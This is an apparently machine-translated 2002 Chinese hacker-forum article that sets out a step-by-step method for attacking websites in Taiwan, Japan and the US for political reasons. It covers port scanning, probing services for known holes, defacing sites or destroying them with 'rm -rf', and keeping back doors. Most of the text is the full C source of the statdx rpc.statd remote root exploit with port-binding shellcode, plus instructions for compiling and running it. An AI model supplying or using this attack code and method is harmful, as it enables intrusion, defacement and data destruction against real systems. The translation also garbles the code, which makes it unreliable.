Attack general step |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  Hacker file>>invasion analysis>> attack general step  
                  Printing

            Attack general step
            Www.cshu.net  2002-10-28  fog rain village 

              Attack general step 
              Bkbll (bkbll@263.net) /cnhonker (www.cnhonker.com) 
              Has not written any thing, this has revealed shortcomings... 
              The attack generally speaking divides into following several 
              steps: 
              1. establishments goals 
              2. scannings 
              3. surveys loopholes and carry on the analysis 
              4. looks for corresponding the exploit procedure 
              5. compilers, and moves Tests whether obtains the root 
              jurisdiction 
              6. in accordance with the situation revise the stand main page or 
              informs webmaster, or comes rm rf/to carry on the thorough 
              destruction 
              7. cleans the battlefield, decided whether keeps the back door 
              8. game ove, was allowed to go eats meal or sleeps (do not have 
              hit me) 
              Under in detail explained that, 
              1. Establishment goal 
              The near section time always has another people indignation some 
              matters Taiwan's advocate of taiwan independence, Japan revise the 
              textbook as well as these day-long US unreasonably  my fighter 
              aircraft the event and so on all to make the general warm-blooded 
              youths indignation not already As red guest alliance, we have the 
              necessity to set &#28781; by to these anti-Chinese influence stands as 
              soon as strike 
              Therefore the goal shrinks decides: Taiwan's Taiwan independence 
              website, Japan's anti-Chinese influence website, US'S certain 
              stands (this step said with me) Certainly also may add on 
              Philippine the rampant influence website 
              2. Scanning 
              Before lion as well as very many warm-hearted red guests alliance 
              &#32593; announced Taiwan, Japan, as well as US'S IP distribution list 
              1. if you want directly to scan, if is the win system, 
              recommendation use before the alliance announces the superscan 
              procedure, the scanning velocity is quick. And can from the 
              definition scanning port as well as timed the out value Also may 
              return to opposite party port the response If is the unix/linux 
              system, the recommendation uses the nmap procedure 
              2. if wants to scan on the meat chicken, please use the nmap 
              procedure 
              Here is unclear thin explained how uses nmap as well as the 
              superscan method 
              Take scans 210.59. *. * as the example. (for guards against 
              revelation, hides changes IP.) The cooked food superscan, fills 
              in IP, chooses port scope which must scan, then starts Scan result 
              as follows: 
              * + 210.59. *. * 
              |___ 21 File Transfer Protocol [ Control ] 
              |___ 22 SSH Remote Login Protocol 
              |___ SSH-1.99-OpenSSH_2.1.1. 
              |___ 23 Telnet 
              |___....... #..' 
              |___ 25 Simple Mail Transfer 
              |___ 220 ep1.eparty.com.tw ESMTP Sendmail 8.11.0/8.11.0; Thu, 11 
              Jan 2,001 13:32:10 +0800.. 
              |___ 53 Domain Name Server 
              |___ 79 Finger 
              |___ 80 World Wide Web HTTP 
              |___ HTTP/1.1 200 OK. Date: Thu, 11 Jan 2,001 05:32:08 GMT. 
              Server: Apache/1.3.12 (Unix) (Red Hat/Linux) mod_ssl/2.6.6 
              OpenSSL/0.9.5 
              |___ 111 SUN Remote Procedure Call 
              |___ 443 https 
              |___ 513 Remote login 
              |___ 514 cmd 
              |___ 1,024 Motorola Cable Modem Telnet 
              |___ 3,306 mysql 
              |___ G... j.Host '210.43.195.200' is not allowed to connect to 
              this MySQL server 
              3. The survey loophole and analyzes 
              Through the scanning result may know opposite party main engine 
              has operated above several ports 
              I About 21 ports, the loophole which possibly exists is the ftpd 
              loophole, if allows the anonymous user (anonymous) to land, 
              moreover has the table of contents which may write 
              On the linux main engine most commonly used ftpd is wu_ftpd. And 
              usually is 2.6.0 editions Already announced this loophole exploit 
              procedure above www.hack.co.za If opposite party ftpd exactly is 
              2.6.0 or below, the permission anonymous lands, and exists may 
              write the table of contents, then this machine was you J. But from 
              this inference, if you have change the main engine any to be 
              allowed the ftp user name and the password, then this main engine 
              similarly may attack 
              II About 22 ports This is the ssh port Theoretically any is 
              smaller than 2.2.0 editions sshd all to be allowed to attack. But 
              I have not now tested J 
              III About 23 ports We may obtain some basic information from 
              here... Has very many stands to lack the province /etc/issue.net 
              not to revise, after our telnet comes up may obtain opposite party 
              main engine name as well as the system edition Certainly, 
              regarding has not had the patch IRIX unix, we may directly carry 
              on the attack using the telnetd loophole, obtains the root 
              jurisdiction 
              IV 25 port sendmail port 8.9 edition all only can carry on the dos 
              attack But the freebsd 8.8.3 editions may the long-distance 
              overflow obtain shell. Generally on our direct telnet 25 ports, 
              then use VRFY to order to verify this main engine user For 
              instance: VRFY bkbll. 
              V 53 port Was the DNS port. Here current has the biggest hidden 
              danger is the bind attack We may long-distance come regarding the 
              bind8.2 DNS server using lion worm to obtain root shell. Surveys 
              opposite party bind edition order: Dig @IP txt chaos version.bind. 

              VI 79 port finger port Unsolved problem May survey user which 
              current lands Method: Finger @IP. 
              VII 80 port Resembles the function in linux and under the unix 
              system not to be big, under NT on mainly depended on its J. But 
              many CGI procedure establishes is improper, has not processed 
              these boundary condition, creates the overflow to be allowed to 
              glance over on the hard disk the document ps. May telnet IP 80, 
              GET obtain opposite party server the type 
              VIII 111 ports Current most popular attack May long-distance 
              obtain root shell. May obtain r series service using rpcinfo p IP 
              which opposite party opens linux to have the stad loophole, sun 
              has the cmsd loophole 
              IX 443 port Has not used 
              X 513 port rlogin port If you transmit echo to the server "++" the 
              >/ rhost order and success execution, then when your rlogin IP 
              time does not use the input password 
              XI 514 port Long-distance executes the order Resembles no loophole 

              XII 1024 has not been useful 
              X III 3306 port mysql.www.hack.co.za above announced several 
              exploit, but I have not tried 
              4. Looks for the exploit procedure 
              Above introduced such many loopholes, the root jurisdiction is as 
              if extremely easy to obtain... Actually otherwise Some times 
              obviously exist loophole, when you translate the good procedure 
              attacks, needs to guess n the many times offset value Here 
              produces commonly used procedure for linux statd. 
              /** 
              *** $ gcc -o statdx statdx.c; . /statdx -h 
              *** buffer -> This is the address you'll need (-a and -l options) 
              *** str -> Process-supplied string; 24 bytes long 
              *** 4 -> Duplicate dwords to satisfy the %! D specifiers and 
              *** the double %n when two successive values are equal 
              *** r -> Stack position of saved eip 
              *** %8x.. -> Wipes the va_list dword and str; 9 by default (-w 
              option) 
              *** %! X -> Used for padding to form an aggregate overwrite value; 

              *** the exclamation mark denotes a field width. This may 
              *** or may not be present, depending on the value. An 
              *** algorithm is used to allow tricky values. 
              *** %n -> Writes overwrite value to the corresponding address 
              *** sc -> Nops + portbinding shellcode (port 39,168) 
              *** 
              *** Only modify the default wipe value and the default offset 
              value if you 
              *** know what you're doing. 
              *** 
              *** An easy way to get the buffer address for simulation systems 
              that you 
              *** have privileged access to: 
              *** 
              *** [ term 1 ] # ltrace -p `pidof rpc.statd` -o foo 
              *** [ term 2 ] $. /statdx -a 0x41414141 localhost 
              *** [ term 1 ] # grep vsnprintf foo | head -1 | sed 's/. * (//' | 
              \ 
              *** awk -F "," ' {print $1} ' 
              *** 
              *** (Of course, ensure that rpc.statd is started at boot time and 
              not from 
              *** an interactive shell, otherwise it will inherit a larger 
              environment 
              *** and blow the accuracy of your findings.) 
              *** 
              *** Ok, longwinded enough. Let's dance. 
              *** 
              *** greets 
              *** ------ 
              *** ADM, attrition, rogues, security.is, teso 
              *** 
              **/ 
              #include <stdio.h> 
              #include <stdlib.h> 
              #include <string.h> 
              #include <errno.h> 
              #include <unistd.h> 
              #include <netdb.h> 
              #include <rpc/rpc.h> 
              #include <sys/types.h> 
              #include <sys/time.h> 
              #include <sys/socket.h> 
              #include <netinet/in.h> 
              #define SM_PROG 100,024 
              #define SM_VERS 1 
              #define SM_STAT 1 
              #define SM_MAXSTRLEN 1,024 
              #define max (a, b) ((a) > (b)? (a): (b)) 
              #define NOP 0x90 
              Char shellcode [ ] = 
              "\x31\xc0" /* xorl %eax, %eax */ 
              /* jmp ricochet 
              ------------------------------------------------------- */ 
              "\xeb\x7c" /* jmp 0x7c */ 
              /* kungfu: 
              ------------------------------------------------------------ */ 
              "\x59" /* popl %ecx */ 
              "\x89\x41\x10" /* movl %eax,0x10 (%ecx) */ 
              /* ------------------------------------ socket (2,,1,0); 
              ---------------- */ 
              "\x89\x41\x08" /* movl %eax,0x8 (%ecx) */ 
              "\xfe\xc0" /* incb %al */ 
              "\x89\x41\x04" /* movl %eax,0x4 (%ecx) */ 
              "\x89\xc3" /* movl %eax, %ebx */ 
              "\xfe\xc0" /* incb %al */ 
              "\x89\x01" /* movl %eax, (%ecx) */ 
              "\xb0\x66" /* movb $0x66, %al */ 
              "\xcd\x80" /* int $0x80 */ 
              /* ------------------------------------ bind (sd, &sockaddr,16); 
              -------- */ 
              "\xb3\x02" /* movb $0x2, %bl */ 
              "\x89\x59\x0c" /* movl %ebx,0xc (%ecx) */ 
              "\xc6\x41\x0e\x99" /* movb $0x99,0xe (%ecx) */ 
              "\xc6\x41\x08\x10" /* movb $0x10,0x8 (%ecx) */ 
              "\x89\x49\x04" /* movl %ecx,0x4 (%ecx) */ 
              "\x80\x41\x04\x0c" /* addb $0xc,0x4 (%ecx) */ 
              "\x88\x01" /* movb %al, (%ecx) */ 
              "\xb0\x66" /* movb $0x66, %al */ 
              "\xcd\x80" /* int $0x80 */ 
              /* ------------------------------------ listen (sd, blah); 
              -------------- */ 
              "\xb3\x04" /* movb $0x4, %bl */ 
              "\xb0\x66" /* movb $0x66, %al */ 
              "\xcd\x80" /* int $0x80 */ 
              /* ------------------------------------ accept (sd,0,,16); 
              -------------- */ 
              "\xb3\x05" /* movb $0x5, %bl */ 
              "\x30\xc0" /* xorb %al, %al */ 
              "\x88\x41\x04" /* movb %al,0x4 (%ecx) */ 
              "\xb0\x66" /* movb $0x66, %al */ 
              "\xcd\x80" /* int $0x80 */ 
              /* ------------------------------------ dup2 (cd,0); 
              ------------------- */ 
              "\x89\xce" /* movl %ecx, %esi */ 
              "\x88\xc3" /* movb %al, %bl */ 
              "\x31\xc9" /* xorl %ecx, %ecx */ 
              "\xb0\x3f" /* movb $0x3f, %al */ 
              "\xcd\x80" /* int $0x80 */ 
              /* ------------------------------------ dup2 (cd,1); 
              ------------------- */ 
              "\xfe\xc1" /* incb %cl */ 
              "\xb0\x3f" /* movb $0x3f, %al */ 
              "\xcd\x80" /* int $0x80 */ 
              /* ------------------------------------ dup2 (cd,2); 
              ------------------- */ 
              "\xfe\xc1" /* incb %cl */ 
              "\xb0\x3f" /* movb $0x3f, %al */ 
              "\xcd\x80" /* int $0x80 */ 
              /* ------------------------------------ execve ("/bin/sh", 
              argv,0); ----- */ 
              "\xc7\x06\x2f\x62\x69\x6e" /* movl $0x6e69622f, (%esi) */ 
              "\xc7\x46\x04\x2f\x73\x68\x41" /* movl $0x4168732f,0x4 (%esi) */ 
              "\x30\xc0" /* xorb %al, %al */ 
              "\x88\x46\x07" /* movb %al,0x7 (%esi) */ 
              "\x89\x76\x0c" /* movl %esi,0xc (%esi) */ 
              "\x8d\x56\x10" /* leal 0x10 (%esi), %edx */ 
              "\x8d\x4e\x0c" /* leal 0xc (%esi), %ecx */ 
              "\x89\xf3" /* movl %esi, %ebx */ 
              "\xb0\x0b" /* movb $0xb, %al */ 
              "\xcd\x80" /* int $0x80 */ 
              /* ------------------------------------ exit (blah); 
              ------------------- */ 
              "\xb0\x01" /* movb $0x1, %al */ 
              "\xcd\x80" /* int $0x80 */ 
              /* ricochet: Call kungfu 
              ---------------------------------------------- */ 
              "\xe8\x7f\xff\xff\xff"; /* call -0x81 */ 
              Enum res 
              {stat_succ, 
              Stat_fail 
              }; 
              Struct sm_name 
              {char *mon_name; 
              }; 
              Struct sm_stat_res 
              {enum res res_stat; 
              Int state; 
              }; 
              Struct type 
              {int type; 
              Char *desc; 
              Char *code; 
              U_long bufpos; 
              Int buflen; 
              Int offset; 
              Int wipe; 
              }; 
              Struct type types [ ] = 
              {{0, "Redhat 6.2 (nfs-utils-0.1.6-2)", shellcode, 0xbffff314, 
              1024, 600, 9}, 
              {1, "Redhat 6.1 (knfsd-1.4.7-7)", shellcode, 0xbffff314, 1024, 
              600, 9}, 
              {2, "Redhat 6.0 (knfsd-1.2.2-4)", shellcode, 0xbffff314, 1024, 
              600, 9}, 
              {0, NULL, NULL, 0, 0, 0, 0} 
              }; 
              Bool_t 
              Xdr_sm_name (XDR *xdrs, struct sm_name *objp) 
              {if (! Xdr_string (xdrs, &objp->mon_name, SM_MAXSTRLEN)) 
              Return (FALSE); 
              Return (TRUE); 
              } 
              Bool_t 
              Xdr_res (XDR *xdrs, enum res *objp) 
              {if (! Xdr_enum (xdrs, (enum_t *) objp)) 
              Return (FALSE); 
              Return (TRUE); 
              } 
              Bool_t 
              Xdr_sm_stat_res (XDR *xdrs, struct sm_stat_res *objp) 
              {if (! Xdr_res (xdrs, &objp->res_stat)) 
              Return (FALSE); 
              If (! Xdr_int (xdrs, &objp->state)) 
              Return (FALSE); 
              Return (TRUE); 
              } 
              Void 
              Usage (char *app) 
              { 
              Int i; 
              Fprintf (stderr, "statdx by ron1n <shellcode@hotmail.com>\n"); 
              Fprintf (stderr, "Usage: %s [ -t ] [ -p port ] [ -a addr ] [ -l 
              len ] \n ", app); 
              Fprintf (stderr, "\t [ -o offset ] [ -w num ] [ -s secs ] [ -d 
              type ] <target>\n"); 
              Fprintf (stderr, "-t\tattack a tcp dispatcher [ udp ] \n"); 
              Fprintf (stderr, "-p\trpc.statd serves requests on <port> [ query 
              ] \n"); 
              Fprintf (stderr, "-a\tthe stack address of the buffer is 
              <addr>\n"); 
              Fprintf (stderr, "-l\tthe length of the buffer is <len> [ 1,024 ] 
              \n"); 
              Fprintf (stderr, "-o\tthe offset to return to is <offset> [ 600 ] 
              \n"); 
              Fprintf (stderr, "-w\tthe number of dwords to wipe is <num> [ 9 ] 
              \n"); 
              Fprintf (stderr, "-s\tset timeout in seconds to <secs> [ 5 ] \n"); 

              Fprintf (stderr, "-d\tuse a hardcoded <type>\n"); 
              Fprintf (stderr, "Available types:\n"); 
              For (i = 0; Types [ i ] desc; I++) 
              Fprintf (stderr, "%d\t%s\n", types [ i ] type, types [ i ] desc); 
              Exit (EXIT_FAILURE); 
              } 
              Void 
              Runshell (int sockd) 
              {char buff [ 1,024 ]; 
              Int fmax, ret; 
              Fd_set fds; 
              Fmax = max (fileno (stdin), sockd) + 1; 
              Send (sockd, "cd /; Ls -alF; Id; \n ", 19, 0); 
              For (; ;) 
              {FD_ZERO (&fds); 
              FD_SET (fileno (stdin), &fds); 
              FD_SET (sockd, &fds); 
              If (select (fmax, &fds, NULL, NULL, NULL) < 0) 
              {perror ("select ()"); 
              Exit (EXIT_FAILURE); 
              } 
              If (FD_ISSET (sockd, &fds)) 
              {bzero (buff, sizeof buff); 
              If ((ret = recv (sockd, buff, sizeof buff, 0)) < 0) 
              {perror ("recv ()"); 
              Exit (EXIT_FAILURE); 
              } 
              If (! Ret) 
              {fprintf (stderr, "Connection closed\n"); 
              Exit (EXIT_FAILURE); 
              } 
              Write (fileno (stdout), buff, ret); 
              } 
              If (FD_ISSET (fileno (stdin), &fds)) 
              { 
              Bzero (buff, sizeof buff); 
              Ret = read (fileno (stdin), buff, sizeof buff); 
              Errno = 0; 
              If (send (sockd, buff, ret, 0)! = ret) 
              { 
              If (errno) perror ("send ()"); 
              Else fprintf (stderr, "Transmission loss\n"); 
              Exit (EXIT_FAILURE); 
              } 
              } 
              } 
              } 
              Void 
              Connection (struct sockaddr_in host) 
              { 
              Int sockd; 
              Host.sin_port = htons (39,168); 
              If ((sockd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) 
              { 
              Perror ("socket ()"); 
              Exit (EXIT_FAILURE); 
              } 
              If (! Connect (sockd, (struct sockaddr *) &host, sizeof host)) 
              { 
              Printf ("OMG! You now have rpc.statd technique! @#$! \n"); 
              Runshell (sockd); 
              } 
              Close (sockd); 
              } 

              Char * 
              Wizardry (char *sc, u_long bufpos, int buflen, int offset, int 
              wipe) 
              { 
              Int i, j, cnt, pad; 
              Char pbyte, *buff, *ptr; 
              U_long retpos; 
              U_long dstpos; 

              While (bufpos % 4) bufpos--; 
              /* buflen + ebp */ 
              Retpos = bufpos + buflen + 4; 
              /* 
              ** 0x00 == '\0' 
              ** 0x25 == '%' 
              ** (add troublesome bytes) 
              ** Alignment requirements aid comparisons 
              */ 
              Pbyte = retpos & 0xff; 
              /* Yes, it's 0x24 */ 
              If (pbyte == 0x00 || pbyte == 0x24) 
              { 
              Fprintf (stderr, "Target address space contains a poison char\n"); 

              Exit (EXIT_FAILURE); 
              } 
              /* 
              ** Unless the user gives us a psychotic value, 
              ** the address should now be clean. 
              */ 
              /* str */ 
              Cnt = 24; 
              /* 1 = process nul */ 
              Buflen -= cnt + 1; 
              If (! (buff = malloc (buflen + 1))) 
              { 
              Perror ("malloc ()"); 
              Exit (EXIT_FAILURE); 
              } 
              Ptr = buff; 
              Memset (ptr, NOP, buflen); 
              For (i = 0; I < 4; I++, retpos++) 
              { 
              /* junk dword */ 
              For (j = 0; J < 4; J++) 
              *ptr++ = retpos >> j * 8 & 0xff; 
              /* r + i */ 
              Memcpy (ptr, ptr - 4, 4); 
              Ptr += 4; Cnt += 8; 
              } 
              /* restore */ 
              Retpos -= 4; 
              For (i = 0; I < wipe; I++) 
              { 
              /* consistent calculations */ 
              Strncpy (ptr, "%8x", 3); 
              Ptr += 3; Cnt += 8; 
              } 
              Dstpos = bufpos + offset; 
              /* 
              ** This small algorithm of mine can be used 
              ** to obtain "difficult" values.. 
              */ 
              For (i = 0; I < 4; I++) 
              { 
              Pad = dstpos >> i * 8 & 0xff; 
              If (pad == (cnt & 0xff)) 
              { 
              Sprintf (ptr, "%%n%%n"); 
              Ptr += 4; Continue; 
              } 
              Else 
              { 
              Int tmp; 
              /* 0xffffffff = display count of 8 */ 
              While (pad < cnt || pad % cnt <= 8) pad += 0x100; 
              Pad -= cnt, cnt += pad; 
              /* the source of this evil */ 
              Tmp = sprintf (ptr, "%%%dx%%n", pad); 
              Ptr += tmp; 
              } 
              } 
              *ptr = NOP; 
              /* plug in the shellcode */ 
              Memcpy (buff + buflen - strlen (sc), sc, strlen (sc)); 
              Buff [ buflen ] = '\0'; 
              Printf ("buffer: %#lx length: %d (+str/+nul) \n ", bufpos, strlen 
              (buff)); 
              Printf ("target: %#lx new: %#lx (offset: %d) \n ", retpos, dstpos, 
              offset); 
              Printf ("wiping %d dwords\n", wipe); 
              Return buff; 
              } 
              Struct in_addr 
              Getip (char *host) 
              { 
              Struct hostent *hs; 
              If ((hs = gethostbyname (host)) == NULL) 
              { 
              Herror ("gethostbyname ()"); 
              Exit (EXIT_FAILURE); 
              } 
              Return * ((struct in_addr *) hs->h_addr); 
              } 

              Int 
              Main (int argc, char **argv) 
              { 
              Int ch; 
              Char *buff; 
              CLIENT *clnt; 
              Enum clnt_stat res; 
              Struct timeval tv, tvr; 
              Struct sm_name smname; 
              Struct sm_stat_res smres; 
              Struct sockaddr_in addr; 
              Int type = -1; 
              Int usetcp = 0; 
              Int timeout = 5; 
              Int wipe = 9; 
              Int offset = 600; 
              Int buflen = 1,024; 
              Char *target; 
              Char *sc = shellcode; 
              U_short port = 0; 
              U_long bufpos = 0; 
              Int sockp = RPC_ANYSOCK; 
              Extern char *optarg; 
              Extern int optind; 
              Extern int opterr; 
              Opterr = 0; 

              While ((ch = getopt (argc, argv, "tp:a:l:o:w:s:d:"))! = -1) 
              { 
              Switch (ch) 
              { 
              Case 't': Usetcp = 1; Break; 
              Case 'p': Sscanf (optarg, "%hu", &port); Break; 
              Case 'a': Sscanf (optarg, "%lx", &bufpos); Break; 
              Case 'l': Buflen = atoi (optarg); Break; 
              Case 'o': Offset = atoi (optarg); Break; 
              Case 's': Timeout = atoi (optarg); Break; 
              Case 'w': Wipe = atoi (optarg); Break; 
              Case 'd': Type = atoi (optarg); Break; 
              Default: Usage (argv [ 0 ]); 
              } 
              } 
              If (! (target = argv [ optind ])) 
              { 
              Fprintf (stderr, "No target host specified\n"); 
              Exit (EXIT_FAILURE); 
              } 
              If (type >= 0) 
              { 
              If (type >= sizeof types/sizeof types [ 0 ] - 1) 
              { 
              Fprintf (stderr, "Invalid type\n"); 
              Exit (EXIT_FAILURE); 
              } 
              Sc = types [ type ] code; 
              Bufpos = types [ type ] bufpos; 
              Buflen = types [ type ] buflen; 
              Offset = types [ type ] offset; 
              Wipe = types [ type ] wipe; 
              } 
              If (! Bufpos) 
              { 
              Fprintf (stderr, "No buffer address specified\n"); 
              Exit (EXIT_FAILURE); 
              } 
              Bzero (&addr, sizeof addr); 
              Addr.sin_family = AF_INET; 
              Addr.sin_port = htons (port); 
              Addr.sin_addr = getip (target); 
              Tv.tv_sec = timeout; 
              Tv.tv_usec = 0; 
              If (! Usetcp) 
              { 
              Clnt = clntudp_create (&addr, SM_PROG, SM_VERS, tv, &sockp); 
              If (clnt == NULL) 
              { 
              Clnt_pcreateerror ("clntudp_create ()"); 
              Exit (EXIT_FAILURE); 
              } 
              Tvr.tv_sec = 2; 
              Tvr.tv_usec = 0; 
              Clnt_control (clnt, CLSET_RETRY_TIMEOUT, (char *) &tvr); 
              } 
              Else 
              { 
              Clnt = clnttcp_create (&addr, SM_PROG, SM_VERS, &sockp, 0, 0); 
              If (clnt == NULL) 
              { 
              Clnt_pcreateerror ("clnttcp_create ()"); 
              Exit (EXIT_FAILURE); 
              } 
              } 
              /* AUTH_UNIX/AUTH_SYS authentication forgery */ 
              Clnt->cl_auth = authunix_create ("localhost", 0, 0, 0, NULL); 
              Buff = wizardry (sc, bufpos, buflen, offset, wipe); 
              Smname.mon_name = buff; 
              Res = clnt_call (clnt, SM_STAT, (xdrproc_t) xdr_sm_name, 
              (caddr_t) &smname, (xdrproc_t) xdr_sm_stat_res, 
              (caddr_t) &smres, tv); 
              If (res! = RPC_SUCCESS) 
              { 
              Clnt_perror (clnt, "clnt_call ()"); 
              Printf ("A timeout was expected. Attempting connection to shell.. 
              \n"); 
              Sleep (5); Connection (addr); 
              Printf ("Failed\n"); 
              } 
              Else 
              { 
              Printf ("Failed - statd returned res_stat: (%s) state: %d\n ", 
              Smres.res_stat? "failure": "success", smres.state); 
              } 
              Free (buff); 
              Clnt_destroy (clnt); 
              Return -1; 
              } 
              /* www.hack.co.za [ 7 August 2,000 ] */ 
              5. Compiler 
              Translation method: Gcc o statdx statdx.c (supposition document 
              named statdx.c) 
              Movement: Statdx h obtains the help 
              d num IP (num=0,1,2) 
              Concrete offset obtains may refer to inside the procedure to 
              mention 
              If attacks successful, should be: 
              Id 
              Uid=0, gid=0... .. 
              Expressed you already were root. You could act in a self-serving 
              manner 
              J 
              PS: If opposite party main engine no guilty of the most heinous 
              crime matter. You do not move it We are the red guest are not 
              crackerJ 
              Little brother first writing... Also looks fellow eldest brothers 
              to instruct.. 



              Original author: Bkbll 
              Origin: Red pledge 
              Altogether has 332 readers to read this article 

              [Tells friend] 
            Previous article:The Lotus founder becomes an official researches 
            and develops Outlook substitution software 

            Next article:How becomes hacker 

            - this week popular article - related article 
            The nc.exe high-level skill application compiles
            QQ attack code
            Hacker technology (use of the DEBUG loophole)
            Invades the hypothesized main engine the simple plan
            The local area network winds viral invasion principle and its guard 
            method
            The security receives in OutLook not the security appendix
            NT loophole summary and use



      CSHU 
